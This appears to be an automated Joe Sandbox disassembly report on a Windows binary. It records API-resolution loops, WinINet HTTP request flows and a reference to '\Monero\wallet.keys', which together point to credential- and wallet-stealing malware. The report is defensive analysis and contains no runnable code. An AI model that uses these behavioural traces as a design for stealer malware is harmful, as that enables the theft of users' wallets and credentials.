                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 15ddcfe297d20330a5973b40efac7538b09e14e4cbc8df313468f8e6960a67ff
                                  • Instruction ID: 4b17d3a49fdde132d2cf514ffcecd794e20b50a608784c6f5bf02948d85f30f3
                                  • Opcode Fuzzy Hash: 15ddcfe297d20330a5973b40efac7538b09e14e4cbc8df313468f8e6960a67ff
                                  • Instruction Fuzzy Hash: 3F4171B1D04248EBDF14DF94DC45BEEBBB8AB48704F104199F609AB381D778AA44CBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E11B7), ref: 007F7A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 2b8b965a46c2afbf63f428e44e491141150acce838e0271a8bcde27689d72ccc
                                  • Instruction ID: bd94754add91995f2b02a81db8993100c7a6ec2ec0683c41617e7333fd4403a9
                                  • Opcode Fuzzy Hash: 2b8b965a46c2afbf63f428e44e491141150acce838e0271a8bcde27689d72ccc
                                  • Instruction Fuzzy Hash: 84F04FB1948209EBCB14DFD8DD45BAEBBB8EB49711F10421AF615A2790C7B55900CBA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 114165bb2bbe2d2151049ae0fa76525a249445fe725d0466e5b33d534afdac09
                                  • Instruction ID: ed79db09e1c4eb0d25b66af8e27c1a44b6cafe99d23009d86dda7ab8c76a247d
                                  • Opcode Fuzzy Hash: 114165bb2bbe2d2151049ae0fa76525a249445fe725d0466e5b33d534afdac09
                                  • Instruction Fuzzy Hash: 09D05E7490430C9BCB00DFE4A84A6DDBB78BB4C215F000654D90572261EA705442CA75

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 7f9f20-7f9f2a 634 7fa346-7fa3da LoadLibraryA * 8 633->634 635 7f9f30-7fa341 GetProcAddress * 43 633->635 636 7fa3dc-7fa451 GetProcAddress * 5 634->636 637 7fa456-7fa45d 634->637 635->634 636->637 638 7fa526-7fa52d 637->638 639 7fa463-7fa521 GetProcAddress * 8 637->639 640 7fa52f-7fa5a3 GetProcAddress * 5 638->640 641 7fa5a8-7fa5af 638->641 639->638 640->641 642 7fa647-7fa64e 641->642 643 7fa5b5-7fa642 GetProcAddress * 6 641->643 644 7fa72f-7fa736 642->644 645 7fa654-7fa72a GetProcAddress * 9 642->645 643->642 646 7fa738-7fa7ad GetProcAddress * 5 644->646 647 7fa7b2-7fa7b9 644->647 645->644 646->647 648 7fa7ec-7fa7f3 647->648 649 7fa7bb-7fa7e7 GetProcAddress * 2 647->649 650 7fa825-7fa82c 648->650 651 7fa7f5-7fa820 GetProcAddress * 2 648->651 649->648 652 7fa922-7fa929 650->652 653 7fa832-7fa91d GetProcAddress * 10 650->653 651->650 654 7fa98d-7fa994 652->654 655 7fa92b-7fa988 GetProcAddress * 4 652->655 653->652 656 7fa9ae-7fa9b5 654->656 657 7fa996-7fa9a9 GetProcAddress 654->657 655->654 658 7faa18-7faa19 656->658 659 7fa9b7-7faa13 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01446400), ref: 007F9F3D
                                  • GetProcAddress.KERNEL32(75900000,01446580), ref: 007F9F55
                                  • GetProcAddress.KERNEL32(75900000,01458FB8), ref: 007F9F6E
                                  • GetProcAddress.KERNEL32(75900000,01458F10), ref: 007F9F86
                                  • GetProcAddress.KERNEL32(75900000,0145CA60), ref: 007F9F9E
                                  • GetProcAddress.KERNEL32(75900000,0145C910), ref: 007F9FB7
                                  • GetProcAddress.KERNEL32(75900000,0144AFF0), ref: 007F9FCF
                                  • GetProcAddress.KERNEL32(75900000,0145C9B8), ref: 007F9FE7
                                  • GetProcAddress.KERNEL32(75900000,0145C850), ref: 007FA000
                                  • GetProcAddress.KERNEL32(75900000,0145C880), ref: 007FA018
                                  • GetProcAddress.KERNEL32(75900000,0145C940), ref: 007FA030
                                  • GetProcAddress.KERNEL32(75900000,014465A0), ref: 007FA049
                                  • GetProcAddress.KERNEL32(75900000,01446420), ref: 007FA061
                                  • GetProcAddress.KERNEL32(75900000,014465C0), ref: 007FA079
                                  • GetProcAddress.KERNEL32(75900000,014465E0), ref: 007FA092
                                  • GetProcAddress.KERNEL32(75900000,0145CA48), ref: 007FA0AA
                                  • GetProcAddress.KERNEL32(75900000,0145C958), ref: 007FA0C2
                                  • GetProcAddress.KERNEL32(75900000,0144B068), ref: 007FA0DB
                                  • GetProcAddress.KERNEL32(75900000,01446440), ref: 007FA0F3
                                  • GetProcAddress.KERNEL32(75900000,0145C988), ref: 007FA10B
                                  • GetProcAddress.KERNEL32(75900000,0145C970), ref: 007FA124
                                  • GetProcAddress.KERNEL32(75900000,0145C9D0), ref: 007FA13C
                                  • GetProcAddress.KERNEL32(75900000,0145C898), ref: 007FA154
                                  • GetProcAddress.KERNEL32(75900000,014462C0), ref: 007FA16D
                                  • GetProcAddress.KERNEL32(75900000,0145C9A0), ref: 007FA185
                                  • GetProcAddress.KERNEL32(75900000,0145C8E0), ref: 007FA19D
                                  • GetProcAddress.KERNEL32(75900000,0145CA00), ref: 007FA1B6
                                  • GetProcAddress.KERNEL32(75900000,0145C9E8), ref: 007FA1CE
                                  • GetProcAddress.KERNEL32(75900000,0145C868), ref: 007FA1E6
                                  • GetProcAddress.KERNEL32(75900000,0145CAC0), ref: 007FA1FF
                                  • GetProcAddress.KERNEL32(75900000,0145C8F8), ref: 007FA217
                                  • GetProcAddress.KERNEL32(75900000,0145C820), ref: 007FA22F
                                  • GetProcAddress.KERNEL32(75900000,0145CA18), ref: 007FA248
                                  • GetProcAddress.KERNEL32(75900000,014599A8), ref: 007FA260
                                  • GetProcAddress.KERNEL32(75900000,0145CA30), ref: 007FA278
                                  • GetProcAddress.KERNEL32(75900000,0145CAD8), ref: 007FA291
                                  • GetProcAddress.KERNEL32(75900000,01446620), ref: 007FA2A9
                                  • GetProcAddress.KERNEL32(75900000,0145C838), ref: 007FA2C1
                                  • GetProcAddress.KERNEL32(75900000,01446660), ref: 007FA2DA
                                  • GetProcAddress.KERNEL32(75900000,0145CA78), ref: 007FA2F2
                                  • GetProcAddress.KERNEL32(75900000,0145CA90), ref: 007FA30A
                                  • GetProcAddress.KERNEL32(75900000,01446280), ref: 007FA323
                                  • GetProcAddress.KERNEL32(75900000,014462A0), ref: 007FA33B
                                  • LoadLibraryA.KERNEL32(0145CAA8,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA34D
                                  • LoadLibraryA.KERNEL32(0145C7F0,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA35E
                                  • LoadLibraryA.KERNEL32(0145C808,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA370
                                  • LoadLibraryA.KERNEL32(0145C8B0,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA382
                                  • LoadLibraryA.KERNEL32(0145C8C8,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA393
                                  • LoadLibraryA.KERNEL32(0145C928,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA3A5
                                  • LoadLibraryA.KERNEL32(0145CB20,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA3B7
                                  • LoadLibraryA.KERNEL32(0145CCD0,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA3C8
                                  • GetProcAddress.KERNEL32(75FD0000,014466E0), ref: 007FA3EA
                                  • GetProcAddress.KERNEL32(75FD0000,0145CB38), ref: 007FA402
                                  • GetProcAddress.KERNEL32(75FD0000,01458820), ref: 007FA41A
                                  • GetProcAddress.KERNEL32(75FD0000,0145CD48), ref: 007FA433
                                  • GetProcAddress.KERNEL32(75FD0000,014469A0), ref: 007FA44B
                                  • GetProcAddress.KERNEL32(6FD30000,0144AF50), ref: 007FA470
                                  • GetProcAddress.KERNEL32(6FD30000,01446740), ref: 007FA489
                                  • GetProcAddress.KERNEL32(6FD30000,0144B2C0), ref: 007FA4A1
                                  • GetProcAddress.KERNEL32(6FD30000,0145CB80), ref: 007FA4B9
                                  • GetProcAddress.KERNEL32(6FD30000,0145CD78), ref: 007FA4D2
                                  • GetProcAddress.KERNEL32(6FD30000,014466A0), ref: 007FA4EA
                                  • GetProcAddress.KERNEL32(6FD30000,01446780), ref: 007FA502
                                  • GetProcAddress.KERNEL32(6FD30000,0145CDA8), ref: 007FA51B
                                  • GetProcAddress.KERNEL32(763B0000,01446860), ref: 007FA53C
                                  • GetProcAddress.KERNEL32(763B0000,01446960), ref: 007FA554
                                  • GetProcAddress.KERNEL32(763B0000,0145CB50), ref: 007FA56D
                                  • GetProcAddress.KERNEL32(763B0000,0145CC88), ref: 007FA585
                                  • GetProcAddress.KERNEL32(763B0000,01446840), ref: 007FA59D
                                  • GetProcAddress.KERNEL32(750F0000,0144B090), ref: 007FA5C3
                                  • GetProcAddress.KERNEL32(750F0000,0144B1A8), ref: 007FA5DB
                                  • GetProcAddress.KERNEL32(750F0000,0145CB68), ref: 007FA5F3
                                  • GetProcAddress.KERNEL32(750F0000,01446760), ref: 007FA60C
                                  • GetProcAddress.KERNEL32(750F0000,01446980), ref: 007FA624
                                  • GetProcAddress.KERNEL32(750F0000,0144B310), ref: 007FA63C
                                  • GetProcAddress.KERNEL32(75A50000,0145CC10), ref: 007FA662
                                  • GetProcAddress.KERNEL32(75A50000,014467A0), ref: 007FA67A
                                  • GetProcAddress.KERNEL32(75A50000,01458920), ref: 007FA692
                                  • GetProcAddress.KERNEL32(75A50000,0145CB98), ref: 007FA6AB
                                  • GetProcAddress.KERNEL32(75A50000,0145CBB0), ref: 007FA6C3
                                  • GetProcAddress.KERNEL32(75A50000,01446820), ref: 007FA6DB
                                  • GetProcAddress.KERNEL32(75A50000,014468E0), ref: 007FA6F4
                                  • GetProcAddress.KERNEL32(75A50000,0145CBC8), ref: 007FA70C
                                  • GetProcAddress.KERNEL32(75A50000,0145CC28), ref: 007FA724
                                  • GetProcAddress.KERNEL32(75070000,014467E0), ref: 007FA746
                                  • GetProcAddress.KERNEL32(75070000,0145CCE8), ref: 007FA75E
                                  • GetProcAddress.KERNEL32(75070000,0145CBF8), ref: 007FA776
                                  • GetProcAddress.KERNEL32(75070000,0145CAF0), ref: 007FA78F
                                  • GetProcAddress.KERNEL32(75070000,0145CC40), ref: 007FA7A7
                                  • GetProcAddress.KERNEL32(74E50000,01446A00), ref: 007FA7C8
                                  • GetProcAddress.KERNEL32(74E50000,014469C0), ref: 007FA7E1
                                  • GetProcAddress.KERNEL32(75320000,01446940), ref: 007FA802
                                  • GetProcAddress.KERNEL32(75320000,0145CBE0), ref: 007FA81A
                                  • GetProcAddress.KERNEL32(6F060000,014467C0), ref: 007FA840
                                  • GetProcAddress.KERNEL32(6F060000,014466C0), ref: 007FA858
                                  • GetProcAddress.KERNEL32(6F060000,014469E0), ref: 007FA870
                                  • GetProcAddress.KERNEL32(6F060000,0145CD90), ref: 007FA889
                                  • GetProcAddress.KERNEL32(6F060000,01446800), ref: 007FA8A1
                                  • GetProcAddress.KERNEL32(6F060000,01446A20), ref: 007FA8B9
                                  • GetProcAddress.KERNEL32(6F060000,01446880), ref: 007FA8D2
                                  • GetProcAddress.KERNEL32(6F060000,014468A0), ref: 007FA8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 007FA901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 007FA917
                                  • GetProcAddress.KERNEL32(74E00000,0145CC58), ref: 007FA939
                                  • GetProcAddress.KERNEL32(74E00000,01458950), ref: 007FA951
                                  • GetProcAddress.KERNEL32(74E00000,0145CD60), ref: 007FA969
                                  • GetProcAddress.KERNEL32(74E00000,0145CC70), ref: 007FA982
                                  • GetProcAddress.KERNEL32(74DF0000,014468C0), ref: 007FA9A3
                                  • GetProcAddress.KERNEL32(6F9A0000,0145CCA0), ref: 007FA9C4
                                  • GetProcAddress.KERNEL32(6F9A0000,01446700), ref: 007FA9DD
                                  • GetProcAddress.KERNEL32(6F9A0000,0145CCB8), ref: 007FA9F5
                                  • GetProcAddress.KERNEL32(6F9A0000,0145CD00), ref: 007FAA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 15286a640c1f616f6adf8dbdd984c74ca1186af567213c46b2f994a4eb3bac2b
                                  • Instruction ID: 39fde41c4f9a7ee0018d3166571b9db9f3f96bca18793950c7c5e431f9ea8c2e
                                  • Opcode Fuzzy Hash: 15286a640c1f616f6adf8dbdd984c74ca1186af567213c46b2f994a4eb3bac2b
                                  • Instruction Fuzzy Hash: 02621DB56182009FC345DFE8FC8896A7BB9A7CD701750871AF909D33B2D7B99942CB60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 7e48d0-7e4992 call 7faab0 call 7e4800 call 7faa50 * 5 InternetOpenA StrCmpCA 816 7e499b-7e499f 801->816 817 7e4994 801->817 818 7e4f1b-7e4f43 InternetCloseHandle call 7fade0 call 7ea210 816->818 819 7e49a5-7e4b1d call 7f8cf0 call 7fac30 call 7fabb0 call 7fab10 * 2 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fac30 call 7fabb0 call 7fab10 * 2 InternetConnectA 816->819 817->816 829 7e4f45-7e4f7d call 7fab30 call 7facc0 call 7fabb0 call 7fab10 818->829 830 7e4f82-7e4ff2 call 7f8b20 * 2 call 7faab0 call 7fab10 * 8 818->830 819->818 905 7e4b23-7e4b27 819->905 829->830 906 7e4b29-7e4b33 905->906 907 7e4b35 905->907 908 7e4b3f-7e4b72 HttpOpenRequestA 906->908 907->908 909 7e4f0e-7e4f15 InternetCloseHandle 908->909 910 7e4b78-7e4e78 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7facc0 call 7fabb0 call 7fab10 call 7fac30 call 7fabb0 call 7fab10 call 7faa50 call 7fac30 * 2 call 7fabb0 call 7fab10 * 2 call 7fade0 lstrlen call 7fade0 * 2 lstrlen call 7fade0 HttpSendRequestA 908->910 909->818 1021 7e4e82-7e4eac InternetReadFile 910->1021 1022 7e4eae-7e4eb5 1021->1022 1023 7e4eb7-7e4f09 InternetCloseHandle call 7fab10 1021->1023 1022->1023 1024 7e4eb9-7e4ef7 call 7facc0 call 7fabb0 call 7fab10 1022->1024 1023->909 1024->1021
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E4965
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E4B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00800DDE,00000000,?,?,00000000,?,",00000000,?,0145E380), ref: 007E4E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E4E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E4E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E4E99
                                  • InternetCloseHandle.WININET(00000000), ref: 007E4EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 007E4F15
                                  • HttpOpenRequestA.WININET(00000000,0145E340,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E4B65
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 007E4F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 14dab410fcd26003abaca6c0ff71ee8d8d094e73572ee8e1ddcf52bd027aed5c
                                  • Instruction ID: 8829e04c8a507895bfa66a354100fe602fe4c01ef07955c991d4dbd2a5c680a0
                                  • Opcode Fuzzy Hash: 14dab410fcd26003abaca6c0ff71ee8d8d094e73572ee8e1ddcf52bd027aed5c
                                  • Instruction Fuzzy Hash: B512EDB191121CEACB15EB94DDA6FFEB379AF14300F104199F20A62291DF786B48CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 7f5760-7f57c7 call 7f5d20 call 7fab30 * 3 call 7faa50 * 4 1106 7f57cc-7f57d3 1090->1106 1107 7f5827-7f589c call 7faa50 * 2 call 7e1590 call 7f5510 call 7fabb0 call 7fab10 call 7fade0 StrCmpCA 1106->1107 1108 7f57d5-7f5806 call 7fab30 call 7faab0 call 7e1590 call 7f5440 1106->1108 1134 7f58e3-7f58f9 call 7fade0 StrCmpCA 1107->1134 1138 7f589e-7f58de call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1107->1138 1124 7f580b-7f5822 call 7fabb0 call 7fab10 1108->1124 1124->1134 1139 7f58ff-7f5906 1134->1139 1140 7f5a2c-7f5a94 call 7fabb0 call 7fab30 * 2 call 7e16b0 call 7fab10 * 4 call 7e1670 call 7e1550 1134->1140 1138->1134 1144 7f590c-7f5913 1139->1144 1145 7f5a2a-7f5aaf call 7fade0 StrCmpCA 1139->1145 1270 7f5d13-7f5d16 1140->1270 1149 7f596e-7f59e3 call 7faa50 * 2 call 7e1590 call 7f5510 call 7fabb0 call 7fab10 call 7fade0 StrCmpCA 1144->1149 1150 7f5915-7f5969 call 7fab30 call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1144->1150 1164 7f5ab5-7f5abc 1145->1164 1165 7f5be1-7f5c49 call 7fabb0 call 7fab30 * 2 call 7e16b0 call 7fab10 * 4 call 7e1670 call 7e1550 1145->1165 1149->1145 1250 7f59e5-7f5a25 call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1149->1250 1150->1145 1171 7f5bdf-7f5c64 call 7fade0 StrCmpCA 1164->1171 1172 7f5ac2-7f5ac9 1164->1172 1165->1270 1201 7f5c78-7f5ce1 call 7fabb0 call 7fab30 * 2 call 7e16b0 call 7fab10 * 4 call 7e1670 call 7e1550 1171->1201 1202 7f5c66-7f5c71 Sleep 1171->1202 1179 7f5acb-7f5b1e call 7fab30 call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1172->1179 1180 7f5b23-7f5b98 call 7faa50 * 2 call 7e1590 call 7f5510 call 7fabb0 call 7fab10 call 7fade0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 7f5b9a-7f5bda call 7faab0 call 7e1590 call 7f5440 call 7fabb0 call 7fab10 1180->1275 1201->1270 1202->1106 1250->1145 1275->1171
                                  APIs
                                    • Part of subcall function 007FAB30: lstrlen.KERNEL32(007E4F55,?,?,007E4F55,00800DDF), ref: 007FAB3B
                                    • Part of subcall function 007FAB30: lstrcpy.KERNEL32(00800DDF,00000000), ref: 007FAB95
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5894
